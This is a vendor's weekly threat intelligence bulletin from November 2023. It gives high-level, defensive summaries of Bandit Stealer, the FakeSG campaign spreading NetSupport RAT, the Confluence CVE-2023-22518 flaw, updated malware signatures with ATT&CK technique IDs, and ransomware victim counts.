|New Threat Detection Added||3 (Bandit Stealer, FakeSG APT and Atlassian Confluence CVE-2023-22518)|
|New Threat Protections||9|
|New Ransomware Victims Last Week||103|
Weekly Detected Threats
The following threats were added to Crystal Eye XDR this week:
Bandit is a type of computer threat that steals important information like usernames and passwords. It targets web browsers, email programs, and even cryptocurrency wallets. The stolen info is then sent to a control server using Telegram. Bandit is smart and tries to avoid being detected by using different tricks when it is on a computer. People have been selling and buying Bandit on secret online forums since April 2023. The program is made using a coding language called Go, which is becoming more common among those who create harmful software.
Rule Set Type:
|Execution T1047 - Defence Evasion T1027/T1036/T1497 - Credential Access T1003/T1056 - Discovery T1016/T1018/T1082/T1497 - Collection T1005/T1056 - Command-and-Control T1071/T1095/T1105|
|Threat name:||FakeSG APT|
Over a couple of years back a campaign called FakeUpdates (SocGholish) was reported by the researchers. It tricks users into running a fake browser update on compromised websites, infecting computers with the NetSupport RAT. This allows hackers to access the victim’s computer remotely and deliver more harmful software. Now, a new player called FakeSG has emerged, using a similar tactic on hacked WordPress sites. FakeSG distributes NetSupport RAT through zipped downloads or Internet shortcuts. Despite being a newcomer, FakeSG employs various layers of obfuscation, making it a serious threat that could compete with SocGholish.
Rule Set Type:
|Execution T1059 - Privilege Escalation T1548 - Defence Evasion T1564/T1218/T1027/T1112/T1548/T1140 - Discovery T1082 - Command-and-Control T1071/T1571|
|Atlassian Confluence CVE-2023-22518|
An improper authorisation vulnerability in the Atlassian Confluence Data Centre and Server may lead to substantial data loss when exploited by an unauthenticated attacker. It is important to note that there is no impact on confidentiality, as the attacker is unable to exfiltrate any data.
Rule Set Type:
|Initial Access T1190|
Known exploited vulnerabilities (Week 2 - November 2023)
Service Location Protocol (SLP) Denial-of-Service Vulnerability
Atlassian Confluence Data Centre and Server Improper Authorization Vulnerability
Updated Malware Signatures (Week 2 - November 2023)
A stealer malware that collects sensitive information from victim machines, encrypts it and exfiltrates it to its Command-and-Control server.
Also known as Zbot and is primarily designed to steal banking credentials.
A malware dropper that is designed to download additional malware on an infected machine.
A Microsoft Word-based malware which is used as a dropper for second-stage malware.
A malware that is used to send spam emails, conduct click frauds and cryptomining.
This malicious software installs and runs cryptocurrency mining applications.
|New Ransomware Victims Last Week:||103|
Red Piranha proactively gathers information about organisations impacted by ransomware attacks through various channels, including the Dark Web. In the past week, our team identified a total of 103 new ransomware victims or updates in the few past victims from 20 distinct industries across 30 countries worldwide. This highlights the global reach and indiscriminate nature of ransomware attacks, which can affect organisations of all sizes and sectors.
LockBit3.0, a specific ransomware, has affected the largest number of victims (27) updates spread across various countries. Alphv and Blackbasta ransomware groups updated 10 victims each. Below are the victim counts (%) for these ransomware groups and a few others.
|Name of Ransomware Group||Percentage of new Victims last week|